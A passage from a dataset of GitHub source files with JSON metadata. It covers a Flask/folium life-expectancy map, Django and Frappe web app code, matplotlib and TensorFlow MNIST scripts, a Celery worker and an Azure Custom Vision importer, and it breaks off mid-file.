Census tract neighbors across ' + \\\r\n 'the U.S. with the widest disparities ' + \\\r\n 'in life expectancy

'\r\n f.html.add_child(folium.Element(title))\r\n f.html.add_child(folium.Element(subtitle))\r\n f.add_child(m)\r\n\r\n # not sure if this works\r\n # data = {'html': f.html}\r\n # if it does not, you can save the file and read it as text\r\n f.save(\"map.html\")\r\n file = open(\"map.html\", \"r\") \r\n data = {'html': file.read()}\r\n \r\n return jsonify(data)\r\n", "repo_name": "pramod-thaz/xls_manager", "sub_path": "services/analytics/life_expectancy.py", "file_name": "life_expectancy.py", "file_ext": "py", "file_size_in_byte": 5372, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}, {"api_name": "geopandas.read_file", "line_number": 44, "usage_type": "call"}, {"api_name": "pysal.weights.Rook.from_dataframe", "line_number": 47, "usage_type": "call"}, {"api_name": "pysal.weights", "line_number": 47, "usage_type": "attribute"}, {"api_name": "networkx.Graph", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.Blueprint", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "folium.Map", "line_number": 97, "usage_type": "call"}, {"api_name": "folium.plugins.MarkerCluster", "line_number": 101, "usage_type": "call"}, {"api_name": "folium.Choropleth", "line_number": 105, "usage_type": "call"}, {"api_name": "folium.CircleMarker", "line_number": 119, "usage_type": "call"}, {"api_name": "folium.Figure", "line_number": 123, "usage_type": "call"}, {"api_name": "folium.Element", "line_number": 129, "usage_type": "call"}, {"api_name": "folium.Element", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "38197084093", "text": "\nfrom rest_framework.serializers import ModelSerializer\n\nfrom positions.models import PositionPing\n\nclass PositionPingSerializer(ModelSerializer):\n class Meta:\n model = PositionPing\n fields = [\n 'latitude', 'longitude', 'altitude', \n 'accuracy', 'altitude_accuracy', 'heading', \n 'speed', 'timestamp', 'logged_at'\n ]\n", "repo_name": "thedejijoseph/touchdown", "sub_path": "positions/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 374, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "name"}, {"api_name": "positions.models.PositionPing", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "27364467545", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pkg import *\nplt.figure(figsize=(8,6))\ngrade = ('before 2010','2010','2011','2012')\nx_pos = np.arange(len(grade))\nperformance = [4.59,23.85,32.11,39.45]\n\nret = plt.bar(x_pos,performance,0.35,color='b',align='center',alpha=0.8)\nplt.xticks(x_pos,grade)\nplt.ylabel('percentage (%)')\nplt.title('The percentage of grade')\nautolabel(ret)\nplt.show()\n", "repo_name": "daozl/james", "sub_path": "code/bar/grade.py", "file_name": "grade.py", "file_ext": "py", "file_size_in_byte": 446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "29128693179", "text": "import json\n\nfrom graphbrain import hgraph\n\n\ndef run(args):\n print('exporting hypergraph...')\n hg = hgraph(args.hg)\n n = 0\n with open(args.outfile, 'w') as f:\n for edge, attributes in hg.all_attributes():\n row = [edge.to_str(), attributes]\n f.write('{}\\n'.format(\n json.dumps(row, ensure_ascii=False)))\n n += 1\n print('{} edges exported.'.format(n))\n", "repo_name": "codeaudit/graphbrain", "sub_path": "graphbrain/commands/export.py", "file_name": "export.py", "file_ext": "py", "file_size_in_byte": 420, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "graphbrain.hgraph", "line_number": 8, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "17416543573", "text": "from .integration import (\n get_category_id_to_tag_id_dictionary,\n image_annotations_to_region,\n)\nfrom .azure_blob import download_json, get_container_sas_token\nfrom tqdm import tqdm\nfrom azure.cognitiveservices.vision.customvision.training.models import (\n ImageUrlCreateEntry,\n)\n\n\ndef import_coco_to_custom_vision(\n custom_vision_client,\n custom_vision_project,\n blob_container_client,\n storage_path,\n coco_file_name,\n):\n # Read coco dataset definition\n file_name = coco_file_name\n if storage_path is not None and len(storage_path) > 0:\n file_name = f\"{storage_path}{coco_file_name}\"\n coco_dataset = download_json(blob_container_client, file_name)\n\n category_id_to_tag_id_dictionary = get_category_id_to_tag_id_dictionary(\n coco_dataset, custom_vision_client, custom_vision_project\n )\n\n container_sas_token = get_container_sas_token(blob_container_client)\n\n images_to_upload = []\n for image in tqdm(\n coco_dataset[\"images\"],\n ascii=True,\n desc=\"Preparing coco images\",\n ):\n image_url = f\"{image['coco_url']}?{container_sas_token}\"\n regions = image_annotations_to_region(\n coco_dataset[\"annotations\"], image, category_id_to_tag_id_dictionary\n )\n images_to_upload.append(ImageUrlCreateEntry(url=image_url, regions=regions))\n\n custom_vision_client.upload_images_from_url(custom_vision_project, images_to_upload)\n", "repo_name": "rndazurescript/Coco2CustomVision", "sub_path": "src/coco2customvision/import_coco.py", "file_name": "import_coco.py", "file_ext": "py", "file_size_in_byte": 1442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "azure_blob.download_json", "line_number": 23, "usage_type": "call"}, {"api_name": "integration.get_category_id_to_tag_id_dictionary", "line_number": 25, "usage_type": "call"}, {"api_name": "azure_blob.get_container_sas_token", "line_number": 29, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 32, "usage_type": "call"}, {"api_name": "integration.image_annotations_to_region", "line_number": 38, "usage_type": "call"}, {"api_name": "azure.cognitiveservices.vision.customvision.training.models.ImageUrlCreateEntry", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "7053299679", "text": "# Lab 9-MNIST\n# Made by: Jinmin Goh\n# Date: 20200306\n\n# MNIST dataset wide deep NN model with tensorboard\n# Acc: 94.2%\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport random\ntf.set_random_seed(777) # for reproducibility\nfrom tensorflow.examples.tutorials.mnist import input_data\n# Check out https://www.tensorflow.org/get_started/mnist/beginners for\n# more information about the mnist dataset\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\nnb_classes = 10\n#MNIST_size = 784\n#hidden_size = 20\n\nX = tf.placeholder(tf.float32, [None, 784])\nY = tf.placeholder(tf.float32, [None, nb_classes])\n\n# layer 1: weight number same with MNIST_size\nwith tf.name_scope(\"Layer1\"):\n W1 = tf.Variable(tf.random_normal([784, 128]), name='weight1')\n b1 = tf.Variable(tf.random_normal([128]), name='bias1')\n layer1 = tf.sigmoid(tf.matmul(X, W1) + b1)\n # histogram\n tf.summary.histogram(\"W1\", W1)\n tf.summary.histogram(\"b1\", b1)\n tf.summary.histogram(\"Layer1\", layer1)\n# layer 2: hidden layer\nwith tf.name_scope(\"Layer2\"):\n W2 = tf.Variable(tf.random_normal([128, 32]), name='weight2')\n b2 = tf.Variable(tf.random_normal([32]), name='bias2')\n layer2 = tf.sigmoid(tf.matmul(layer1, W2) + b2)\n tf.summary.histogram(\"W2\", W2)\n tf.summary.histogram(\"b2\", b2)\n tf.summary.histogram(\"Layer2\", layer2)\n# layer 3: hidden layer\nwith tf.name_scope(\"Layer3\"):\n W3 = tf.Variable(tf.random_normal([32, 16]), name='weight3')\n b3 = tf.Variable(tf.random_normal([16]), name='bias3')\n layer3 = tf.sigmoid(tf.matmul(layer2, W3) + b3)\n tf.summary.histogram(\"W3\", W3)\n tf.summary.histogram(\"b3\", b3)\n tf.summary.histogram(\"Layer3\", layer3)\n# layer 4: 10 classifications\nwith tf.name_scope(\"Layer4\"):\n W4 = tf.Variable(tf.random_normal([16, nb_classes]), name='weight4')\n b4 = tf.Variable(tf.random_normal([nb_classes]), name='bias4')\n hypothesis = tf.nn.softmax(tf.matmul(layer3, W4) + b4)\n tf.summary.histogram(\"W3\", W4)\n tf.summary.histogram(\"b3\", b4)\n tf.summary.histogram(\"Hypothesis\", hypothesis)\n\n# Cross entropy\nwith tf.name_scope(\"Cost\"):\n cost = tf.reduce_mean(-tf.reduce_sum(Y * tf.log(hypothesis), axis=1))\n tf.summary.scalar(\"Cost\", cost)\nwith tf.name_scope(\"Train\"):\n train = tf.train.GradientDescentOptimizer(learning_rate = 1).minimize(cost)\n\n# Test model\nis_correct = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))\n# Calculate accuracy\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\ntf.summary.scalar(\"Accuracy\", accuracy)\n\n# parameters\nnum_epochs = 15 # training count of entinre training data\nbatch_size = 100 # splitting size of whole dataset\nnum_iterations = int(mnist.train.num_examples / batch_size)\n\nwith tf.Session() as sess:\n # Initialize TensorFlow variables\n merged_summary = tf.summary.merge_all()\n writer = tf.summary.FileWriter(\"./logs/MNIST\")\n writer.add_graph(sess.graph)\n sess.run(tf.global_variables_initializer())\n # Training cycle\n for epoch in range(num_epochs):\n avg_cost = 0\n for i in range(num_iterations):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n _, summary, cost_val = sess.run([train, merged_summary, cost], feed_dict={X: batch_xs, Y: batch_ys})\n avg_cost += cost_val / num_iterations\n writer.add_summary(summary, global_step = i + epoch * num_iterations)\n print(\"Epoch: {:04d}, Cost: {:.9f}\".format(epoch + 1, avg_cost))\n print(\"Learning finished\")\n # Test the model using test sets\n print(\n \"Accuracy: \",\n accuracy.eval(\n session=sess, feed_dict={X: mnist.test.images, Y: mnist.test.labels}\n ),\n )\n # Get one and predict\n r = random.randint(0, mnist.test.num_examples - 1)\n print(\"Label: \", sess.run(tf.argmax(mnist.test.labels[r : r + 1], 1)))\n print(\n \"Prediction: \",\n sess.run(tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r : r + 1]}),\n )\n plt.imshow(\n mnist.test.images[r : r + 1].reshape(28, 28),\n cmap=\"Greys\",\n interpolation=\"nearest\",\n )\n plt.show()\n\n", "repo_name": "Jinmin-Goh/DeepLearningPractice", "sub_path": "Lab/Lab9/Lab9-MNIST.py", "file_name": "Lab9-MNIST.py", "file_ext": "py", "file_size_in_byte": 4128, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.set_random_seed", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 15, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.summary.scalar", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 81, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}]} +{"seq_id": "14127294857", "text": "from django import views\nfrom django.urls import include, path\nfrom . import views\n\nurlpatterns = [\n path('',views.index, name='index'), #uses \"from . import views\"\n path('login/',views.login, name='login'),\n path('register/',views.register, name='register'),\n path('products/',views.products, name='products'),\n path('single/',views.single, name='single'),\n path('add-to-cart/',views.add_to_cart, name='add-to-cart'),\n path('cart/',views.cart, name='cart'),\n path('delete-cart/',views.delete_cart,name='delete-cart'),\n path('checkout/',views.checkout,name='checkout'),\n path('success/',views.success,name='success'),\n]\n", "repo_name": "ankitpatelcs/EcomDjangoProject", "sub_path": "myapp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 669, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.views.index", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.views.login", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.views.register", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.views.products", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.views.single", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.views.add_to_cart", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.views.cart", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.views.delete_cart", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.views.checkout", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.views.success", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "75297970408", "text": "import os\nimport importlib\nimport typing as t\n\nimport numpy as np\nfrom celery import Celery, states\nfrom celery.exceptions import Ignore\n\n\ncelery = Celery(__name__)\nREDIS_URL = \"redis://{host}:{port}/0\".format(\n host=os.getenv('REDIS_HOST', 'localhost'),\n port=os.getenv('REDIS_PORT', '6379')\n)\ncelery.conf.broker_url = REDIS_URL\ncelery.conf.result_backend = REDIS_URL\n\n\n@celery.task(bind=True, name='tasks.vectorize_text')\ndef vectorize_text(self, text: str) -> t.List[float]:\n # Lazy import!\n # If TextVectorizer is imported globally,\n # you shuold install large dependencies (like torch) to FastAPI container. \n text_vectorizer = importlib.import_module('src.ml.text_vectorizer')\n\n text = text[:256] if len(text) >= 256 else text\n try:\n res = text_vectorizer.TextVectorizer.vectorize(text)\n if isinstance(res, np.ndarray):\n res = res.tolist()\n return res\n except Exception as e:\n self.update_state(\n state = states.FAILURE,\n meta = e\n )\n raise Ignore()\n ", "repo_name": "fyk7/text-vectorizer-k8s", "sub_path": "src/worker/worker.py", "file_name": "worker.py", "file_ext": "py", "file_size_in_byte": 1062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "celery.Celery", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "celery.conf", "line_number": 15, "usage_type": "attribute"}, {"api_name": "celery.conf", "line_number": 16, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 29, "usage_type": "attribute"}, {"api_name": "celery.states.FAILURE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "celery.states", "line_number": 34, "usage_type": "name"}, {"api_name": "celery.exceptions.Ignore", "line_number": 37, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 19, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "attribute"}]} +{"seq_id": "33956342074", "text": "import frappe\nfrom frappe.website.utils import is_signup_enabled\nfrom frappe.utils import escape_html\nfrom frappe.utils import getdate, get_time, flt, now_datetime\nfrom club_crm.club_crm.doctype.fitness_training_appointment.fitness_training_appointment import cancel_appointment_online\nfrom datetime import datetime, timedelta, date, time\nfrom frappe import throw, msgprint, _\nfrom club_crm.api.wallet import get_balance\n\n@frappe.whitelist()\ndef get_fitness_category(client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n if not client.status == \"Disabled\":\n doc = frappe.get_all('Fitness Training Request', filters={'client_id':client.name, 'request_status':['in', {'Pending','Scheduled'}]}, fields=['*'])\n if doc:\n for doc_1 in doc:\n if doc_1.request_status==\"Pending\":\n frappe.response[\"message\"] = {\n \"Status\":0,\n \"Status Message\": \"A pending request exists\",\n \"Document ID\" : doc_1.name\n }\n else:\n schedule=frappe.get_list('Fitness Training Trainer Scheduler', filters={'parent':doc_1.name,'parentfield':'table_schedule'}, fields=['day','date','from_time','to_time'], order_by=\"date asc\")\n \n frappe.response[\"message\"] = {\n \"Status\":1,\n \"disabled\": 0,\n \"Status Message\": \"Training has been scheduled\",\n \"Document ID\": doc_1.name,\n \"rate\": doc_1.price,\n \"package_name\": doc_1.fitness_package,\n \"Number of Sessions\": doc_1.number_of_sessions,\n \"Schedule\": schedule\n }\n else:\n fitness_category = frappe.get_all('Fitness Services', filters={'on_app': 1}, fields=['fitness_name','image'])\n fitness_item = []\n for item in fitness_category:\n fitness_item.append({\n \"category_name\" : item.fitness_name,\n \"category_image\" : item.image\n })\n frappe.response[\"message\"] = {\n \"Status\":2,\n \"disabled\": 0,\n \"Fitness Categories\": fitness_item\n }\n else:\n frappe.response[\"message\"] = {\n \"Status\":3,\n \"disabled\": 1\n }\n\n@frappe.whitelist()\ndef get_fitness_package(fitness_category):\n fit_category = frappe.get_doc('Fitness Services', fitness_category)\n all_fitness_package = frappe.get_all('Club Packages', filters={'on_app': 1, 'package_type': 'Fitness'})\n packages = []\n for item in all_fitness_package:\n single_package = frappe.get_doc('Club Packages', item.name)\n for package in single_package.package_table:\n if package.service_name == fitness_category:\n sessions = int(package.no_of_sessions/4)\n if sessions == 0:\n sessions = 1\n validity = int(package.validity // (24 * 3600))\n packages.append({\n \"name\": item.name,\n \"duration\": int(fit_category.duration),\n \"no_of_session\": package.no_of_sessions,\n \"validity\": validity,\n \"sessions_per_week\": sessions,\n \"price\": package.price,\n \"fitness_category\": fitness_category\n })\n \n frappe.response[\"message\"] = {\n \"Fitness Categories\": packages\n }\n\n@frappe.whitelist()\ndef get_trainer(fitness_package,client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n club_package = frappe.get_doc('Club Packages', fitness_package)\n for package in club_package.package_table:\n fit_trainer = frappe.get_all('Fitness Services Assignment', filters={'fitness_package': package.service_name, 'on_app':1}, fields=['name','parent','parenttype','parentfield','gender_preference'])\n trainers = []\n for trainer in fit_trainer:\n doc_1 = frappe.get_doc('Service Staff', trainer.parent)\n if doc_1.on_app == 1:\n if trainer.gender_preference == \"Same Gender\":\n if doc_1.gender == client.gender:\n trainers.append({\n 'Trainer': doc_1.display_name,\n 'Description': doc_1.description,\n 'Image': doc_1.image,\n 'Gender': doc_1.gender\n })\n elif trainer.gender_preference == \"No Preference\":\n trainers.append({\n \"Trainer\": doc_1.display_name,\n \"Description\": doc_1.description,\n \"Image\": doc_1.image,\n \"Gender\": doc_1.gender\n })\n return trainers\n\n@frappe.whitelist()\ndef get_pt_appointments():\n rating_point = -1\n disabled = 0\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n if client.status == \"Disabled\":\n disabled = 1\n time = frappe.get_doc('Fitness Training Settings')\n\n sessions = []\n client_session_list = frappe.get_all('Client Sessions', filters={'client_id': client.name, 'session_status': 'Active', 'package_type': 'Fitness'}, order_by=\"expiry_date asc\")\n if client_session_list:\n for client_session in client_session_list:\n client_session_doc = frappe.get_doc('Client Sessions', client_session.name)\n sessions.append({\n 'package_name': client_session_doc.package_name,\n 'expiry_date' : client_session_doc.expiry_date,\n 'used_sessions': client_session_doc.used_sessions,\n 'remaining_sessions': client_session_doc.remaining_sessions\n })\n\n details=[]\n pt_list = frappe.get_all('Fitness Training Appointment', filters={'client_id':client.name}, fields=['name','start_time'], order_by=\"appointment_date asc\")\n if pt_list:\n for pt in pt_list:\n pt_doc = frappe.get_doc('Fitness Training Appointment', pt.name)\n cancel_time = pt_doc.start_time - timedelta(seconds=int(time.pt_cancellation_time))\n start_date = pt_doc.start_time.date()\n\n rating_list = frappe.get_all('Rating', filters={'document_id':pt.name}, fields=['rating_point'])\n if rating_list:\n for rating in rating_list:\n rating_point = rating.rating_point\n details.append({\n \"name\": pt_doc.name,\n \"date\": start_date,\n \"client_id\" : pt_doc.client_id,\n \"client_name\": pt_doc.client_name,\n \"package_name\": pt_doc.fitness_service,\n \"trainer_name\": pt_doc.service_staff,\n \"status\": pt_doc.appointment_status,\n \"start_time\": pt_doc.start_time,\n \"end_time\": pt_doc.end_time,\n \"payment_status\": pt_doc.payment_status,\n \"cancellation_time\" : cancel_time,\n \"rating\": rating_point\n })\n\n frappe.response[\"message\"] = {\n \"disabled\": disabled,\n \"pt_appointments\": details,\n \"packages\": sessions\n }\n\n@frappe.whitelist()\ndef get_appointments(client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n doc = frappe.get_all('Fitness Training Appointment', filters={'client_id':client.name}, fields=['name','booking_date','client_id','client_name','fitness_service','service_staff','appointment_status','start_time','end_time','payment_status'], order_by=\"appointment_date asc\")\n details=[]\n if doc:\n for rating in doc:\n # start_time = datetime.strftime(rating.start_time, \"%H:%M:%S\")\n # end_time = datetime.strftime(rating.end_time, \"%H:%M:%S\")\n start_date = rating.start_time.date()\n\n rate=frappe.get_all('Rating', filters={'document_id':rating.name}, fields=['rating_point'])\n #cancel_time = rating.start_time - timedelta(seconds=int(time.spa_cancel_time))\n if rate:\n rate=rate[0]\n details.append({\n 'pt_appointment': {\n \"name\": rating.name,\n \"date\": start_date,\n \"client_id\" : rating.client_id,\n \"client_name\": rating.client_name,\n \"package_name\": rating.fitness_service,\n \"trainer_name\": rating.service_staff,\n \"status\": rating.appointment_status,\n \"start_time\": 